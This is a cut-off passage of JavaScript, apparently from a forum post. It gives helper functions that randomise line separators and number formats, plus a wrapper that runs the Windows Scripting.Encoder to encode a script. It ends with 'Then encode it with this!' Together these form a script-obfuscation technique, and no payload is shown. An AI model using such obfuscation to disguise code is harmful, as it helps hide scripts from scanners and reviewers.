return _bx;
}
function _bx1(_num)
{
//randomly generate \r \n \r\n \n\r ;
var _bx="";
switch (Math.floor(Math.random()*_num)) {
case 0:
_bx='\r';break;
case 1:
_bx='\n';break;
case 2:
_bx='\n\r';break;
case 3:
_bx='\r\n';break;
default :
_bx=';';
}
return _bx;
}
function _bx2(_num)
{
//randomly generate numbers in base 8 (0), 10, 16 (0x 0X AF af), with (+ -) sign, floating point (eE), decimal point
var _bx=(Math.random()>0.5?'+':'-');
_bx=(Math.random()>0.5?'':_bx);
_num =Math.floor( Math.random()*_num );
switch (Math.floor(Math.random()*4)) {
case 0:
_bx=_bx+'0'+_num.toString(8);break;
case 1:
_bx=_bx+_num.toString(10);break;
case 2:
_bx=_bx+'0x'+_num.toString(16);break;
case 3:
_bx=_bx+'0'+_num.toString(10);break;
default :
_bx='';
}
return _bx;
}
function ScriptEncoder(code,Script)
{
if (code)return new ActiveXObject("Scripting.Encoder").EncodeScriptFile("."+Script,code,0,"");
}
Then encode it with this!
That should do it!